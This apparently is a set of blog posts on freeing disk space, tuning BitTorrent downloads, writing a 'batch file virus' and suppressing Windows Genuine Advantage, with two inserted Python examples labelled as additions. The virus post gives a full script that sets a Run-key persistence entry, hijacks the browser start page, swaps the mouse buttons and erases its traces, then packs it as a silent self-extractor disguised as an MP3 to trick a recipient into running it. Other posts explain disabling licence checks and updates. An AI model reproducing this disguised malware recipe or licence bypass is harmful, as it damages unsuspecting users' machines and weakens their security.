Clean the junk – free up the space

Many of us wonder where our ever-scarce HDD space goes … There have been cases where the total size of the data on a drive does not match what is shown in the drive properties. A few must even have been given a low disk space warning for the system drive. The visible data is easy to manage: just back it up if required and then delete it from your HDD. The issue is what is hidden from mankind …!!

In this post we will see how to free up space on your system, particularly on the system drive, and learn about the system services that eat up space.

Step1: The first simple task when you notice space being hogged on your system drive is to uninstall unnecessary programs. The regular Add or Remove Programs wizard isn’t good, since it leaves behind zombie files and registry entries belonging to the uninstalled application. This is where Revo Uninstaller comes into the picture. Apart from running the regular built-in uninstaller, Revo Uninstaller also scans for and removes leftover files and registry entries. Using Revo, remove all those programs that you don’t use.

Revo has another option to clean junk files as well … Click on the Tools option … Click Junk File cleaner … Click scan … After the scan finishes, a list of junk data is displayed. Delete them … Often those are prefetch files and thumbs.db files. They sometimes even add up to a few hundred MBs over time.

Step2: Seek substitutes for bulky programs, those which are light on resources and consume less space as well. I prefer these ones-

  1. CD burner XP: CD burner XP is a fully loaded burning solution for your digital media which, in contrast with Nero, occupies a mere 7 MB of space. The only requirement is that you need a version of the .NET Framework installed.
  2. Foxit reader: This PDF reader occupies just 5-6 MB of space, in contrast with Adobe Reader, which occupies at least 150 MB of space.
  3. Media player classic: The K-Lite Codec Pack is an all-loaded solution for playing all media formats, instead of keeping all sorts of players installed.
  4. AVG Internet Security suite is also light on resources and space, occupying 50 MB on HDD … Its protection, combined with its ease on resources, makes it preferable over the McAfee and Norton sorts.

Step3: Temporary files created during browsing and installing applications stay in your temp folder for a long period … If the disk cleanup wizard is being ignored, they can keep on collecting and often eat up a good chunk of your HDD space. Install CCleaner; it is a really good tool to delete temporary files and clean junk from the registry as well. It cleans browsing history too. Run it at least twice a week to keep your HDD free of junk.

Also empty your virus vault, delete application reports etc.

Note: Eusing Free Registry Cleaner is a great application to clean your registry. You can use it in combination with CCleaner to keep your registry clean.

Step4: Windows services too eat up space on your HDD. System restore and space allocated to recycle bin are two major space eaters.

System restore is by default enabled on all drives and is allocated 12% of HDD space. This means for a 320 GB HDD, 38.4 GB is being reserved for system restore. Similarly, the recycle bin is also given 10% of your HDD space on a global pattern by default. If you seldom use the recycle bin function, like many of us do, it is best to allocate it much less space and save the rest for other useful purposes. System restore too can be allocated less space. Only the most recent restore point is really of interest; more space allocated just means more restore points, which occupy space even if you never use them.

The space can be claimed back easily. Right click on the recycle bin and go to properties … There, on a global pattern, space is allotted to each drive; just change it to what you think best suits you. If you never use the recycle bin, assign it a really low value.

Similarly you may change the space allocated to system restore. Just right click on your My Computer icon, select properties, and click on the System Restore tab. There you may disable system restore on non-system drives and set it to 1-2% on the system drive.

Step5: Hibernation service too, if enabled on XP (by default active on Vista), consumes space equal to your installed RAM on your system drive. Weigh your options: do you really need this service? If not, you may disable it … In control panel, go to power options, open the hibernation tab, and uncheck the enable hibernation option.

Step6: Virtual memory equal to 1.5 times your RAM is allotted on your system drive by default. This is to facilitate operations in case you run out of RAM … If you already have 2 GB plus RAM, then you can set it equal to your RAM size. It is also recommended that you shift the assigned space to a non-system drive to boost performance, which also frees up space on the system drive.

Right click on My computer icon > click properties > Go to advanced tab > Under performance section, click settings > Select advanced tab > under virtual memory section, click change.

Disable it on system drive and allocate it to some other drive where space is plenty.

Warning: NEVER disable it fully or assign it really low. In case you have sufficient RAM, like 2 GB plus, only then set it equal to your RAM size. Else, for less than 1 GB RAM, you may better assign it recommended 1.5 GB of space.

Step7: Now for something that may be eating the largest chunk of space on your system drive: your documents. By default, your ‘My documents’ are saved in the documents and settings folder on the system drive. Everything you save in My music, My pictures, My videos etc. goes there. Many applications too save their files in your documents location, including download managers, torrent clients etc. The solution is to simply change the default location to a non-system drive where space is plenty. This also saves your data in case you were to format your system drive. Once the default location is changed, all your data is automatically transferred, and from now on all your data is stored at the new location.

Simply right click on My documents link in start menu and select properties. In target folder location, select move and browse to the new location, a non system drive where space is plenty. Set it there.

Step8: After the above steps, it is time to launch an offensive against junk manually. Many applications leave their installer backups, settings files and temp files behind when they are removed normally. There are probably plenty of them on your system drive. Go to folder options > view > check show hidden files and folders > uncheck hide extensions of known file types > uncheck hide operating system files … Apply. Now enter your system drive.

You can now see the system hidden files too. If you have not shifted page file or not disabled hibernation, you can now see a hibernation.sys file and pagefile.sys file. Also the system volume information and recycler folders are visible. So are some other files like ntldr, autoexecute.bat etc. DON’T delete them!!! They are required by your system.

Get into the ‘documents and settings’ folder and your user folder. There enter local settings > application data. There carefully check if there are any folders of applications that aren’t installed at present and delete them. Also browse the installed application folders and delete any installer backups. Move your way around, slowly you will learn what is important and what is junk.

This way you can free up space on your system drive. The best bet is to arrange your data in an organized manner, this makes it easy to manage it and take backup or delete what you don’t need. Happy shifting!

Enter the torrents


In the world of file sharing, there is no greed….. You give what you have and take what you want… The more you give, the more you will get… And when file sharing is in discussion, there are many players: Rapidshare, Ares, Kazaa, Limewire, Shareaza, eMule, etc… But BitTorrent sharing, popularly known as torrents, is the best… In this post we will learn torrent basics, how to download files using torrents, a few tips to unleash the beast within BitComet, and scheduling torrents for download during happy hours.

Torrent network- How it basically works:

A .torrent file is a file that contains the basic information about a file or set of files. This includes the file names, sizes, the date created and some other information. The torrent file also contains an info hash – which is basically just a unique code for that torrent. No other set of file(s) will have the same info hash as this one. The final thing contained inside the torrent is a list of trackers. If you have some torrent files, you can’t open them in a text editor because they are encoded. You will need to open them in torrent client software.
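What a torrent client reads out of such a file, as an added example that is not part of the original post: .torrent files are bencoded, and the info hash is the SHA-1 of the raw bencoded info dictionary. The tracker URL, file name and piece data in the sample are constructed, and the nesting cap is an assumption.

```python
import hashlib

MAX_DEPTH = 32  # assumption: cap nesting so a hostile file cannot exhaust the stack


def bencode(obj):
    """Minimal encoder, used here only to build the constructed sample."""
    if isinstance(obj, int):
        return b"i%de" % obj
    if isinstance(obj, str):
        obj = obj.encode()
    if isinstance(obj, bytes):
        return b"%d:%s" % (len(obj), obj)
    if isinstance(obj, list):
        return b"l" + b"".join(bencode(x) for x in obj) + b"e"
    if isinstance(obj, dict):  # keys must be emitted in sorted byte order
        items = sorted((k.encode(), v) for k, v in obj.items())
        return b"d" + b"".join(bencode(k) + bencode(v) for k, v in items) + b"e"
    raise TypeError(type(obj).__name__)


def _decode(data, pos, depth, spans):
    """Decode one value at data[pos]; return (value, position after it)."""
    if depth > MAX_DEPTH:
        raise ValueError("nesting too deep")
    lead = data[pos:pos + 1]
    if lead == b"i":
        end = data.index(b"e", pos)
        text = data[pos + 1:end]
        digits = text[1:] if text.startswith(b"-") else text
        if not digits.isdigit() or (digits[:1] == b"0" and text != b"0"):
            raise ValueError("malformed integer")
        return int(text), end + 1
    if lead in (b"l", b"d"):
        pos += 1
        out = [] if lead == b"l" else {}
        while data[pos:pos + 1] != b"e":
            item, pos = _decode(data, pos, depth + 1, spans)
            if lead == b"l":
                out.append(item)
                continue
            if not isinstance(item, bytes):
                raise ValueError("dictionary key is not a string")
            start = pos
            out[item], pos = _decode(data, pos, depth + 1, spans)
            if depth == 0 and item == b"info":
                spans["info"] = (start, pos)  # raw bytes that get hashed
        return out, pos + 1
    if lead.isdigit():
        colon = data.index(b":", pos)
        if not data[pos:colon].isdigit():
            raise ValueError("malformed string length")
        end = colon + 1 + int(data[pos:colon])
        if end > len(data):
            raise ValueError("string runs past end of file")
        return data[colon + 1:end], end
    raise ValueError("unexpected byte at offset %d" % pos)


def parse_torrent(data):
    """Return info hash, name, size, piece count and trackers of a .torrent."""
    spans = {}
    meta, end = _decode(data, 0, 0, spans)
    if end != len(data) or not isinstance(meta, dict) or "info" not in spans:
        raise ValueError("not a well-formed .torrent file")
    info = meta[b"info"]
    if not isinstance(info, dict):
        raise ValueError("info is not a dictionary")

    def text(value):
        return value.decode("utf-8", "replace") if isinstance(value, bytes) else None

    tiers = meta.get(b"announce-list")
    flat = [meta.get(b"announce")]
    for tier in tiers if isinstance(tiers, list) else []:
        flat += tier if isinstance(tier, list) else []
    pieces = info.get(b"pieces")
    start, stop = spans["info"]
    return {
        "info_hash": hashlib.sha1(data[start:stop]).hexdigest(),
        "name": text(info.get(b"name")),
        "length": info.get(b"length"),
        "piece_count": len(pieces) // 20 if isinstance(pieces, bytes) else 0,
        "trackers": list(dict.fromkeys(text(t) for t in flat if isinstance(t, bytes))),
    }


# Constructed sample: tracker URL, file name and piece hashes are made up.
SAMPLE_INFO = {"length": 32768, "name": "MyFile.bin", "piece length": 16384,
               "pieces": hashlib.sha1(b"piece 0").digest() + hashlib.sha1(b"piece 1").digest()}
SAMPLE = bencode({"announce": "http://tracker.example/announce",
                  "creation date": 1230768000, "info": SAMPLE_INFO})

if __name__ == "__main__":
    print(parse_torrent(SAMPLE))
```

The hash covers only the info dictionary, so the same content announced on a different tracker keeps the same info hash, while any change to the file name or piece hashes produces a different one.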

A tracker is a computer on the Internet. The tracker’s role is to manage live torrent files and keep track of statistics. When you open a torrent file in your client software, your client software contacts the tracker specific to that torrent. Your client tells the tracker how much of the actual files (described by the torrent) you currently have.

A seeder is a person who has 100% of the files described by the torrent. If a torrent has no seeders, then no one (currently talking to the tracker) has anything to give.

A peer is a person who is looking for the files described by the torrent. The more peers the more people are actively looking for the files described by the torrent. A peer while downloading the file uploads it as well. When he finishes his download, he continues to upload it, thus becoming a seed.

A leech is a person who initially acts as a peer but after he finishes his download, leaves the swarm, freeing his part of bound bandwidth. Hence, if more and more people start to leech, older torrents will die out since there will be no seeds left.

A BitTorrent client is any program that implements the BitTorrent protocol. Each client is capable of preparing, requesting, and transmitting any type of computer file over a network, using the protocol.

Working: To share a file or group of files, a user (seeder) first creates a small file called a “torrent” (e.g. MyFile.torrent). This file contains metadata about the files to be shared and about the tracker. Peers that want to download the file must first obtain a torrent file for it and connect to the specified tracker, which tells them from which other peers to download the pieces of the file. The peer opens the file in a torrent client, which analyses the data stored in the torrent file and downloads it from the seeder and other peers. Your download speed depends on the number of seeds and the number of peers that have more data than you: the more seeds and the more peers with more data, the higher your download speed. But if the number of peers becomes too high, it has a negative impact, since there is more competition for the bandwidth of the seeds.

Torrent clients have an option to limit the upload rate when they are acting as peers or seeds, and some users misuse it to merely download and upload next to nothing. The BitTorrent network works on a principle of give and take: users who share more data while acting as peers, or who act as seeds once their downloads complete, are rewarded with more download speed, while those who don’t, and leechers, are punished. But when a peer joins a swarm, he has no data and thus cannot seed. Hence, theoretically, he should not be getting any data from seeds and other peers. The BitTorrent network has a feature called Optimistic Choking, which provides an initial bandwidth to new users, letting them download without uploading.

A few lines on downloading using torrents:

  1. The first step is to download the torrent. They are available at sites of trackers. Eg, Pirate Bay, ISO hunt, Mininova, etc. Search in these sites for your required data.
  2. When results turn up, choose the torrent that has maximum seeds and minimum peers, ie, greater seed/peer ratio. They help you attain more speeds. Also read comments, they are really helpful, avoiding embarrassment after having downloaded the data!
  3. Having downloaded the torrent, you need a torrent client. I prefer Bitcomet, feature rich, light and zippy …. A good interface when compared to other clients, and equally feature rich. Compared to others like Azureus (now Vuze), it has simple settings, which can easily be tweaked. Download and install Bitcomet.
  4. Open the Torrent file in Bitcomet, just double click on the file, it opens. It automatically starts downloading.
  5. Depending on speed, the torrent download finishes and it starts uploading itself. Do upload for a while, since there are many users who now depend on you for the file. The more you upload, the more you get back in terms of speed. If everyone starts to leech, the torrent will die.

Tips to improve BitComet performance:

BitComet can reach amazing speeds with a few little tweaks. The problem is that most users stick to default settings that came when they installed. Also people expect magical speeds even though they intentionally or unintentionally don’t upload anything! We now will tweak BitComet a little, so that it lives up to our expectations.

Open BitComet main interface, go to tools -> Options. Now start tweaking:-

  1. Upload speed: In the connections tab, there is a choice to alter the download and upload speeds. Download can be set to unlimited without any issue, but if the upload speed crosses your limits, downloads suffer. Hence, know your capabilities first. Setting upload to unlimited isn’t advisable either. Run a speed test first-

You will know your speeds now. In TCP/IP networking, every piece of data received has to be acknowledged by sending a small packet back to the sender, saying that the previous data packet was received and the receiver is ready for another. If you are uploading at maximum speed, it becomes tough to send that acknowledgment packet, so the next data packet is delayed, causing the download to suffer. This is known as ‘choking’.

To prevent this, set your upload limit to 75% of your maximum upload speed. The speed shown in the test is in terms of kbps (kilobits per second) but we enter it in terms of kBps in BitComet. Hence to convert, divide the speed by 8 and multiply by 0.75. The result should be set as the upload limit.

  2. Listen port: By default a listen port is assigned. Since this is the default, there will be a lot of traffic there. Change it to any random port between 49152 and 65534. Listening improves your speed greatly, hence should be enabled at all costs.
  3. Port mapping: Tick enable NAT\Firewall configuration; this will let Bitcomet register its listening port in Windows Firewall. But enabling UPnP mapping sometimes causes stability issues, hence can be left un-ticked.
  4. Tasks: In the task main menu, under download, tick auto resume tasks at program startup. This will help us out later in scheduling. Also limit the number of concurrent download tasks to 3-5. This setting depends on your modem and connection. Letting only one task run, if it’s not well seeded, costs you more time since you are capable of more. Set it to at least 3. This will cumulatively help in utilizing all of the available bandwidth. Experiment to find what suits you and set it.
    a. BT task: In auto stop task, un-tick the option; it’s better left un-ticked for better speeds.
    b. In upload, set the maximum rate of upload per task as the global upload speed (found in step 1) divided by the number of concurrent tasks you chose. Choose a minimum of at least 5 KBPS.
    c. Enable long time seeding and set the upload speed to the max upload speed per task chosen above. Long time seeded torrents will upload themselves continuously, and fetch you more speed.
  5. Integration: In integration, if you have an unlimited bandwidth scheme, choose to start Bitcomet at Windows startup; limited plan users should un-tick it. This will assist us in scheduling.
  6. Advanced: In the main menu of advanced, set network maximum connecting connections (max simultaneous half open TCP connections) as 70-100. Choose a value that suits you. Also set network maximum connections (Global maximum connections) as 200-250. This will prevent your modem getting disconnected in case of heavy overloading due to the multiple connections torrents develop.
    a. TCP/IP limit: Set the TCP/IP limit as 70-100. By default it is 10. This will greatly improve your download speed with torrents.
    b. Schedule: According to plan details, you can either leave this option as unlimited, or on a limited plan choose max speed during the happy hour time and set the rest as turn off… Set upload speeds accordingly, since they supersede the global upload speeds.

Apply these settings and restart your PC. Register an account with Bitcomet. Registered users get better speeds. Now it is time to verify whether your listening port is forwarded properly. Just connect to the internet and view the rightmost button in the bottom toolbar. It should turn yellow on establishing a listening port. Usually, dial-up connections have this forwarded easily. PPPoE mode users need to get into their modem configuration wizard and change NAT policies to enable it. Follow this procedure-

  1. In address bar type as address. This is the address of your modem. Both user name and password are admin. In some other cases, the username is admin and the password is password.
  2. This will open your modem configuration settings. In advanced setup, go to NAT. From here the steps depend on your modem.
    1. For the type 1 provided by BSNL, UTstar com r2u, in NAT, just enter DMZ host ip address as 192.168.1.x, where x should not be 1 if DHCP is enabled. Choose it as . Save and apply.
    2. For some other modems, you will need to add a profile in NAT and then enter the IP. Some other ones ask you for the port too. Add your selected Bitcomet port. Just enter the data, save and reboot the modem.
    3. The IP mentioned is the static IP provided by BSNL. If you happen to have a dynamic IP, enter it accordingly.

After having configured your modem, it’s time to configure the firewall. Add Bitcomet to the list of trusted applications and allow it privileges to access all services. Different firewalls have their own particular methods. Use one which is torrent friendly. For example, AVG firewall blocks all outgoing communications even with Bitcomet configured as trusted. I switched to Outpost free then; it’s working fine now. Visit this site for more assistance-

Now, open Bitcomet and check if third light on bottom toolbar is glowing. This verifies port is forwarded. Remember, slower downloads can be attributed to mainly these reasons-

  1. Port not forwarded in modem\router.
  2. Firewall blocking communications.
  3. Upload slot is too narrow, increase the limits.
  4. Default TCP\IP settings.

Having tweaked your client, let’s move on to scheduling downloads….

Scheduling torrent download tasks:

For limited bandwidth plan users, it’s a curse to wake up late in the night to start the download and again early in the morning to stop it. Bitcomet comes with a scheduler, but keeping Bitcomet active outside the happy hours will cause long time seeding, and keeping your PC on while waiting for happy hours also adds to the electricity bill.

Isn’t there a way out of this vicious circle? So that you may go to bed early and wake up late, …. and still download?? Realizing your dilemma, I reacted and churned out a solution in recent days when I was idle at home, thanks to my holidays. So, I present before you- Auto-connect, the download scheduler. Download it from downloads section, you will always find the latest version there. Or visit the Auto Connect support page-

Download Auto-Connect

Since I have already mentioned a lot of Gyaan in the help file, I prefer being a bit lazy and not repeating it all back here, will just outline the download procedure.

As I had already mentioned while tweaking Bitcomet, tick “Auto resume tasks on program startup” and un-tick “start Bitcomet on login windows”. This will prevent accidental downloads during off happy hours when you log on windows. Also auto resume tasks will help automate downloads, since downloads will start as soon as you launch the client, no need to start tasks manually.

Note: In “Auto resume tasks…” , only those tasks will resume which were running when you closed the client last time. The paused and stopped tasks don’t resume.

Scheduling involves these steps:

  1. First set up Auto Connect and schedule a dial-up task. This applies only to dial-up mode users. Schedule a connect task at least 5 minutes inside the happy hours slot. Also enable the wakeup from sleep feature for this task.
  2. Then go on and schedule a disconnect task at least 5 minutes before the end of happy hours. This will disconnect your connection at the scheduled time.
  3. Then schedule an application run task, a minute or two after the time of the connect task. Choose the application as Bitcomet.
  4. Then go on and schedule an application close task. It should be a minute before the scheduled disconnect task. Choose the application to close as Bitcomet.
  5. Then schedule a sleep task. Set the time as a minute after the disconnect task. This will put your PC back to sleep again.

Caution!! :

  1. PC wakes only from sleep or hibernation, it won’t wake up when it was turned off.
  2. Keep your modem turned on when you go to sleep. The schedule will resume, but my software unfortunately can’t press the modem power ON button if it is off!!
  3. You may keep your monitor turned off to save power.
  4. There is no need to wonder how to enable hibernation, if it was off in your PC. Auto Connect will turn it ON on first run. But be sure space equivalent to your RAM is free on your Windows drive, else hibernation can’t be set!
  5. You need to schedule an application close task for Bitcomet at end of happy hours to hibernate, since Bitcomet won’t let your PC hibernate when a download is in progress.

This schedule will wake up your PC from sleep at dial up task time and connect to internet. Then it will launch your Bitcomet client. Since auto resume tasks have been chosen, downloads will start automatically. At near end of happy hours, Bitcomet will close as scheduled, internet disconnects and then PC goes back to sleep.

Note: The users of PPPoE or always ON mode don’t need steps 1 & 2. They can directly schedule an application run task, with wakeup option, to run their suitable modem reboot module as mentioned in Auto connect support page. PC will wake up, modem will reboot, reconnect to internet and resume scheduled download. Other steps follow accordingly.

Make your own batch file virus

<< Read this newer post on making batch file viruses, loads of new tricks on batch virus programming and tips on how to remove them >>


It’s always been this way that we fellows are the good guys and save the day fighting malware threats… But as they say, you need to think like a criminal to catch one! And so we do the same: to understand how malware works, how it gains access and gains control, we will ourselves make a batch file based virus. A little knowledge of programming, just enough to follow how we do it, and knowledge of the Windows registry are prerequisites.

Batch files, characterised by their .bat extension, are files containing a sequence of DOS commands that get executed when the batch file is run. This allows you to make simple programs that perform simple tasks within the limitations of the DOS shell. Though higher level languages like BASIC, PASCAL and C interact with the system at a lower level, batch file processing is a good start to understand malware.

The kind of malware that we are going to learn to make is one that will perform a simple task of changing desktop wallpaper, interchanging the left and right mouse keys, changing start page of internet explorer(6), and make a start-up entry so that it starts every time system starts. Though this sounds like a simple task, automation of this procedure such that it works on a single wrong click by user and runs all tasks without any confirmation and hidden is a tough job when started from scratch.

The components of the virus will be a main executable file, under cover of some attractive icon, which on execution extracts in background to a batch file and the wallpaper, then runs the batch file.

Before the code, let’s learn a few basics, first on the creation of batch files. These aren’t special files created by some special application. They are simple Notepad files, wherein code is written and the extension then changed to .bat. They run simple tasks like MOVE, COPY, RENAME etc., a few moderate tasks like changing file attributes (i.e. making a file hidden, giving it the system attribute or removing attributes) and a few complex tasks like altering the system registry without user intervention. The main drawback of a batch file is that it doesn’t remain active in memory (though we can make it do so with a loop); it just performs the stated tasks and shuts down. Hence, it can act as a trigger, and not the process itself.

Now, let’s learn a few commands of batch files. Though a basic knowledge of DOS is crucial, if not, you can still follow what’s going on. Starting with a simple rename command, the syntax is-

RENAME [drive:][path]filename1 filename2

Example:             RENAME "C:\documents and settings\aijaz.txt" gyaan.dat

Hence we see we can change the extension of file as well. If the path and drive of file aren’t specified, it is assumed that the file is in the current directory where from CMD is running.

Example:             RENAME aijaz.txt gyaan.dat

This command searches a file name aijaz.txt in current directory and renames it to gyaan.dat.

Coming to MOVE command, it moves the file from one path to another. It is like cut and paste. The syntax is-

MOVE [/Y | /-Y] [drive:][path]filename destination

The /Y attribute assigned allows CMD to overwrite files without confirmation, hence maintaining cover from user.

Example: MOVE /Y C:\aijaz.txt D:\

This moves the file aijaz.txt to drive D: . While moving a file, if source path isn’t mentioned, then it is assumed that the file is in current directory. But destination path is mandatory.

We use the move command to change the wallpaper. The wall paper once set, is converted to a bitmap image and is then moved to the directory–

C:\Documents and Settings\<user name>\Local Settings\Application Data\Microsoft

But the Windows directory may be on a different drive like D: or E:, and the user name isn’t known either. This makes it unsuitable to mention a specific path in our code. We use system parameters to identify the Windows drive and user profile directory. The parameter %userprofile% returns the user profile part of the path shown above (C:\Documents and Settings\<user name>). To give a path in CMD using system parameters, we need to write the path in quotation marks. The command to change the wallpaper becomes-

MOVE /y Wallpaper1.bmp "%USERPROFILE%\Local Settings\Application Data\Microsoft"

This moves the wallpaper from the current directory to the location where the wallpaper is stored.

Note: It is to be kept in mind that windows actually use only uncompressed bitmap images as wallpapers. Whenever we set an image as wallpaper, it is converted to bitmap and then stored at above mentioned location in user profile with name wallpaper1, hence the reason. Thus, the wallpaper we use here should already be a bitmap image, use an image editing tool like Irfanview which does a good job at conversion to bitmap.

Once the wallpaper has been replaced, the system needs to be updated for change to take place on desktop. This is done using the command-

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

After the batch file has executed, we do not want it left on the host PC, where the user might open it and view the code, which discloses the location of our batch virus and also the registry key we have added. This is done by simply deleting the files.

Del /F /Q /A:SHR filename

/F forces deletion of read only files, /Q suppresses the confirmation to delete, /A deletes files based on given attributes. S- System, H- Hidden, R- Read only.

Now coming to editing registry, there are two methods of editing a key, first by making a .REG file using batch print tool to write registry keys in a file and later appending them to registry. But this method adds a couple of more lines to our code. Hence we prefer the second method of editing registry directly via command line using REG command.

The syntax to add a key to registry is-

REG ADD <main key> /v <sub key> /t <data type> /d <value> /f

The /f parameter enables editing a key without confirmation from the user. Our intention is to add a start-up entry in the registry such that our code gets executed every time Windows logs on. Hence the wallpaper is changed again, making the innocent user panic! The actual key we use is-

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f

The above command writes a start-up key which makes the file pointed by the key run every time windows start. We use %windir% parameter to make sure that no error is encountered in case OS is installed on some other drive.

The point to be noticed here is that the same technique is used by malware to make sure it remains active in memory. The first thing to be done after ending the execution of malicious code is to terminate its start-up mechanism. Refer to the post Eradicate malware.
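A defender's view of the start-up entry described above, as an added example that is not part of the original post: it parses saved `reg query` output for the Run key and flags entries that deserve a closer look. The sample output, the list of system process names and the `C:\WINDOWS` default are assumptions made for the example, and a flag is a prompt for review, not a verdict.

```python
import ntpath
import re

# Assumption for this example: value names that imitate core Windows processes.
SYSTEM_PROCESS_NAMES = {"winlogon", "svchost", "csrss", "lsass", "smss",
                        "services", "explorer"}
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs")

# "    <value name>    REG_SZ    <data>" as printed by reg query
LINE = re.compile(r"^\s+(?P<name>.+?)\s+(?P<type>REG_[A-Z_]+)\s+(?P<data>.*)$")
EXECUTABLE = re.compile(r"^(.*?\.(?:exe|bat|cmd|com|scr|pif|vbs))(?:\s|$)", re.I)


def parse_reg_query(text):
    """Return (value name, type, data) for every value line in the output."""
    entries = []
    for line in text.splitlines():
        match = LINE.match(line)
        if match:
            entries.append((match["name"], match["type"], match["data"].strip()))
    return entries


def target_path(data):
    """Extract the program path from a Run value, dropping any arguments."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    match = EXECUTABLE.match(data)  # unquoted paths may contain spaces
    return match.group(1) if match else data.split(" ", 1)[0]


def review_run_key(text, windir=r"C:\WINDOWS"):
    """Flag Run entries that look like the start-up trick described above."""
    roots = {ntpath.normcase(windir), "%windir%", "%systemroot%"}
    findings = []
    for name, _type, data in parse_reg_query(text):
        path = target_path(data)
        reasons = []
        stem = ntpath.splitext(name)[0].lower()
        base = ntpath.splitext(ntpath.basename(path))[0].lower()
        if stem in SYSTEM_PROCESS_NAMES and base != stem:
            reasons.append("value name imitates a system process")
        if ntpath.normcase(ntpath.dirname(path)) in roots:
            reasons.append("target sits directly in the Windows directory")
        if path.lower().endswith(SCRIPT_EXTENSIONS):
            reasons.append("target is a script")
        if reasons:
            findings.append({"name": name, "target": path, "reasons": reasons})
    return findings


# Constructed sample of `reg query` output; the first two entries stand in for
# ordinary software, the third is the entry written by the command above.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Acme Updater    REG_SZ    "C:\Program Files\Acme\updater.exe" /background
    winlogon    REG_SZ    C:\WINDOWS\force.exe
"""

if __name__ == "__main__":
    for finding in review_run_key(SAMPLE_REG_QUERY):
        print(finding["name"], "->", finding["target"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Because cmd expands %windir% before REG ADD runs, the stored value normally holds the expanded path, which is why the check compares against the actual Windows directory as well as the unexpanded variable names.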

Similarly to change the start page of internet explorer (tested on IE 6), the registry key is-

REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d /f

Since IE 6 stores the default start page in registry key, it is very vulnerable to this simple attack. I am still working on changing start page of Mozilla Firefox.

Now to add a little more insult to injury, how about tying down our victim’s right arm and make him struggle with his left? We gonna switch the right and left keys of our mouse, making our victim panic even more! Here is the command….

RUNDLL32.exe USER32.DLL,SwapMouseButton

Having learned a few tricks of trade, let’s put down the final batch file code. Open a notepad file and key down this script….


REG ADD HKCU\Software\Microsoft\InternetExplorer\Main /v StartPage /t REG_SZ /d /f

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f

copy /y Wallpaper1.bmp  "%USERPROFILE%\Local Settings\Application Data\Microsoft"

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

RUNDLL32.exe USER32.DLL,SwapMouseButton

rename song.exe  force.exe

move /y force.exe "%windir%"

del /Q force.bat

del /Q wallpaper.bmp

Save the file and change its extension to .bat. This is the core virus file. Now pick up a photo of our victim and edit it so that it will annoy him the most! This can simply be done by opening the file in Notepad and making it funny or, if you know how to, by editing it in Photoshop. Sites like PhotoFunia can also be used to spoil the photo. Usually these photos are in JPEG format. As mentioned earlier, we need a bitmap image. Convert it to bitmap using an image editing tool, preferably Irfanview since it preserves the quality of the photo. Rename this photo to wallpaper1.

It’s quite obvious that nobody will click a suspicious looking batch file, thanks to my previous posts! The second task is to pack our batch file and wallpaper into a single file and change its icon, to mask it, so that user will be compelled to open it. The file can be made to look like a folder, or an mp3 file or a word file or anything. What you need is WinRAR and another software called IconFX.

Install IconFX and run it. In file menu, go to extract icons. Browse for shell32.dll file located in windows\system32 directory and extract and save icon of folder. You can also use the snap tool of iconFX and take snap of files to make an .ico icon file. Here we will name our packed file as song and select icon as an mp3 file icon. Just take snap of mp3 file, preferably windows media player icon. Save the icon at some location.

  1. Install WinRAR on your PC. Select the two files, batch file and bitmap wallpaper by holding Ctrl key, right click and select add to archive option.
  2. In the opened window, click Create SFX archive.
  3. Go to Advanced tab and SFX options in it. In path to extract, select create in current folder. In setup program section, in Run after extract, add name as force.bat.
  4. In Modes tab, under silent mode section, select hide all.
  5. In update tab, in overwrite section, select overwrite all files.
  6. In text and icon tab, under Customize SFX logo and icon, in Load SFX icon from file, browse and set icon as MP3 icon. Click OK and compress the files. You will get a single .exe file which has an icon of mp3 file. Let’s rename this file as song.

Note: The names force.bat and song.exe must not be changed, since they are referred by those names in batch code.

Now we have a file with name song, having an mp3 icon, quite innocent looking but having really naughty intentions! But the problem here is that if we mail it as it is, either clients like Yahoo don’t allow attaching .exe files, or when the victim downloads the file its extension is shown, exposing our plot. Hence, in case of mailing this virus, compress it to a simple .RAR file and mail it. The victim will extract it, and then see a file with name song and icon of mp3. In curiosity, he will open it and our job is done!!

Though I am still working on making better ones, but I would like to end this post with a message that this was just for a little fun and to develop an understanding how malware works. Let’s not drift towards the wrong side of society!


Windows Genuine Advantage

Having a genuine copy of Windows is really worth it, considering the support and updates from Microsoft, and even new upgrades ask for validation. But there are reports that even genuine licence holders sometimes get caught in the WGA trap, if forums are to be believed.

Windows Genuine Advantage is Microsoft’s anti-piracy tool that verifies whether the licence you use for Windows is genuine. It comes included in a few upgrades, or as an update in Windows Update, or you are asked to validate when you download something from Microsoft. If verification of the licence fails, the tool sets up a startup process that pops up a window on the logon screen, and a toolbar notice on the desktop as well, informing you that you use a pirated version of Windows, which makes it really annoying.

Let’s be on the right side and believe you got caught in this issue even though you hold a genuine licence 🙂. Here is a solution that stops the annoying process while you get the issue solved by Microsoft.

The hard way- The startup application uses files wgalogon.dll and wgatray.exe . To get started, go to folder options-view and un-tick hide extensions of known file types. Apply and exit. The process of stopping it consists of two steps-

i. Cutting the database- Go to C:\windows\system32 and search for a file named wgalogon.dll . Rename it to wgalogon.dll.bak . Create a new text document and rename it to wgalogon.dll . Upon saving, a confirmation is asked to change extension, confirm yes.

ii. Now in same directory search for a file wintray.exe . Using killbox, while ending explorer shell, delete the file. Restart the system. The pop up will no longer come.

The soft way- A software counterfeiting error may also be generated  even when we change the original key with a software generated key, resulting in conflict. So, in case you have the original key, use the magic jelly bean key finder tool. It not only displays the current key, but you can also go to options and change the key installed as well. Just change the key to original one and the pop up should no longer appear.

The easy way- There are programs available that can remove WGA error on a click. For novice users, it’s a bliss. Check out the one available at- .

In case you haven’t been troubled yet and don’t want your Windows verified, just run MSCONFIG, go to services and disable automatic updates and also security centre (else it pops up an error that automatic updates are disabled). A little disconnected from Microsoft, you can continue your secret life!

The next post is going to be about being the BAD guy… a dose of batch file programming to make your own kitchen made viruses! Trick your friends, play pranks on pals, make your enemies suck, it’s time for a little mischief!!



